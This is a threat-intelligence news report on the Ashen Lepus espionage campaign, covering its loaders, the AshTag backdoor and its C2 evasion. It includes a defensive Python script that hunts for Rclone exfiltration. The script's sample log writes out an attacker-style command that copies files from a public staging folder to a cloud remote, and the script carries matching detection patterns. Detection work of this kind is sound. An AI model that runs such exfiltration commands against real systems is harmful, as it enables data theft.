
Palo Alto Networks has uncovered new details about an extensive espionage campaign run by Ashen Lepus, a Hamas‑linked cyber group that has maintained persistent operations against governmental and diplomatic bodies across the Middle East. According to the company, the group not only continued its activity throughout the Israel-Hamas conflict but intensified its efforts even after the October 2025 Gaza ceasefire, deploying newly developed malware and engaging directly within compromised networks.

Researchers reported that Ashen Lepus, active since 2018, has expanded its traditional target set beyond the Palestinian Authority, Egypt, and Jordan, now reaching entities in Oman and Morocco and showing new interest in Turkey. Despite this broader geographic reach, many of the lures used in phishing attempts continue to revolve around Middle East geopolitical issues, particularly those involving the Palestinian Territories. Recent decoys included documents referencing Turkish defense policy, alleged Hamas training in Syria, and discussions surrounding Palestinian political developments.

The group’s infection chain remains multi‑stage but has undergone significant upgrades. Ashen Lepus continues to distribute a benign‑looking PDF that directs targets to download a RAR archive containing a disguised binary file, a malicious loader, and a secondary decoy document. When opened, the binary triggers DLL side‑loading that launches updated versions of the group’s loader, known as AshenLoader, which displays the decoy document while running malicious processes in the background.

Palo Alto Networks identified a notable shift in the group’s command‑and‑control infrastructure. Rather than relying on attacker‑owned domains, Ashen Lepus now registers API and authentication‑themed subdomains under legitimate‑looking hostnames, a tactic that helps blend malicious traffic into regular internet activity. These domains include medical and technology‑related names, and many of the servers are geofenced to prevent automated analysis systems from accessing them. Secondary payloads are embedded within HTML tags, and the servers validate geolocation and unique User‑Agent strings before responding.

At the heart of the campaign is a new malware suite named AshTag, described as a modular .NET-based backdoor capable of file exfiltration, downloading additional content, and executing further modules entirely in memory. The infection chain progresses through the execution of AshenLoader, the retrieval of a stager dubbed AshenStager, and the loading of AshTag through a component known as AshenOrchestrator. The orchestrator decodes modules hidden within webpage content and can activate features such as system fingerprinting, persistence, file management, and screen capture.

Investigators reported that Ashen Lepus conducted hands‑on activity after the initial compromise. Attackers staged selected documents in public folders and exfiltrated the data using Rclone, a legitimate file transfer tool increasingly adopted by malicious actors to disguise their activity. The stolen material was taken directly from victims’ mail accounts and appeared to focus on diplomatic documents, consistent with the group’s long‑standing intelligence collection objectives.
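The Rclone step above is the one a defender can hunt for most directly, because the tool announces its direction of transfer on the command line: an outbound push has a local source and a remote (`<name>:<path>`) destination. The Python below is an added example and is not code from the Palo Alto Networks report or from Rclone itself. It parses constructed process-creation log lines (the `host= user= image= cmdline=` layout, hostnames, user names and paths are all invented for this illustration), recognises Rclone transfer verbs and remote syntax, ignores inbound restores and read-only listings, and additionally notes when the source sits in a public staging folder such as `C:\Users\Public`, matching the staging behaviour the investigators describe.

```python
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Rclone verbs that move data between a source and a destination (real Rclone subcommands).
TRANSFER_VERBS = {"copy", "copyto", "sync", "move", "moveto"}
# Rclone flags that take their value as the following token (real flags; list not exhaustive).
VALUE_FLAGS = {"--config", "--transfers", "--bwlimit", "--include", "--exclude", "--filter-from"}
# Rclone addresses a configured remote as "<name>:<path>". Requiring two or more
# characters before the colon keeps Windows drive letters such as "C:\..." from matching.
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]{2,}:")
# Common world-writable / public staging locations, normalised to lowercase forward slashes.
PUBLIC_DIRS = ("/users/public", "/programdata", "/tmp", "/var/tmp")
# Constructed log layout assumed for this example: host=<h> user=<u> image=<path> cmdline="<cmd>"
EVENT_RE = re.compile(r'host=(\S+) user=(\S+) image=(\S+) cmdline="(.*)"$')


@dataclass
class Finding:
    host: str
    user: str
    source: str
    remote: str
    public_staging: bool
    cmdline: str


def is_rclone(token: str) -> bool:
    """True if the token names the rclone binary (any directory, optional .exe)."""
    base = token.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base in ("rclone", "rclone.exe")


def analyze_rclone(cmdline: str) -> Optional[Tuple[str, str]]:
    """Return (local_source, remote_destination) when the command line is an Rclone
    transfer whose destination is a configured remote and whose source is not,
    i.e. the outbound direction an exfiltration takes. Otherwise return None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # non-POSIX mode keeps Windows backslashes
    except ValueError:
        return None
    if not argv or not is_rclone(argv[0]):
        return None
    positional = []
    skip_next = False
    for tok in argv[1:]:
        if skip_next:
            skip_next = False
            continue
        if tok.startswith("-"):
            skip_next = tok in VALUE_FLAGS  # "--flag value" form; "--flag=value" needs no skip
            continue
        positional.append(tok.strip('"'))
    if len(positional) < 3 or positional[0].lower() not in TRANSFER_VERBS:
        return None
    src, dst = positional[1], positional[2]
    if REMOTE_RE.match(dst) and not REMOTE_RE.match(src):
        return src, dst
    return None


def hunt(lines: List[str]) -> List[Finding]:
    """Run the Rclone check over process-creation log lines in the constructed layout."""
    findings = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        host, user, _image, cmdline = m.groups()
        result = analyze_rclone(cmdline)
        if result is None:
            continue
        src, dst = result
        norm_src = src.lower().replace("\\", "/")
        staged = any(p in norm_src for p in PUBLIC_DIRS)
        findings.append(Finding(host, user, src, dst, staged, cmdline))
    return findings


# Constructed sample events: one benign editor launch, one outbound push from a public
# folder, one inbound restore by a backup account, and one read-only remote listing.
SAMPLE_LOG = [
    r'host=WS-07 user=CORP\jdoe image=C:\Windows\System32\notepad.exe cmdline="notepad.exe C:\Users\jdoe\notes.txt"',
    r'host=WS-07 user=CORP\jdoe image=C:\Users\Public\rclone.exe cmdline="rclone.exe copy C:\Users\Public\stage mega:docs --transfers 4 --config C:\Users\Public\rc.conf"',
    r'host=SRV-02 user=CORP\backup image=C:\Tools\rclone.exe cmdline="rclone.exe sync backup:srv02 D:\restore"',
    r'host=LNX-03 user=ops image=/usr/bin/rclone cmdline="/usr/bin/rclone lsd gdrive:"',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        note = " (source is a public staging folder)" if f.public_staging else ""
        print(f"{f.host} {f.user}: rclone pushed {f.source} -> {f.remote}{note}")
```

Only the second sample line is reported: the restore on SRV-02 runs in the inbound direction and the `lsd` on LNX-03 transfers nothing. The direction check is what keeps legitimate backup jobs out of the alert stream; pairing the finding with the account, host and source folder gives an analyst the context to separate an administrator's scheduled sync from a push of staged documents.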

Throughout 2025, the group refined its malware loaders, adopting AES‑CTR‑256 encryption, expanding system‑fingerprinting capabilities, and repeatedly adjusting the structure of its command‑and‑control URLs. While these changes do not radically alter functionality, they improve the group’s ability to evade static detection tools.

Palo Alto Networks has released indicators of compromise, including malware hashes, encryption keys, scheduled task names, and associated C2 domains. The company warns that Ashen Lepus is likely to continue adapting its toolset and expanding its targeting as it pursues intelligence related to regional geopolitical developments, noting that the group remains unusually active compared with others operating in the same sphere.

The company shared its findings with the Cyber Threat Alliance and advised governmental and diplomatic organizations throughout the Middle East to remain vigilant amid the actor’s ongoing campaigns.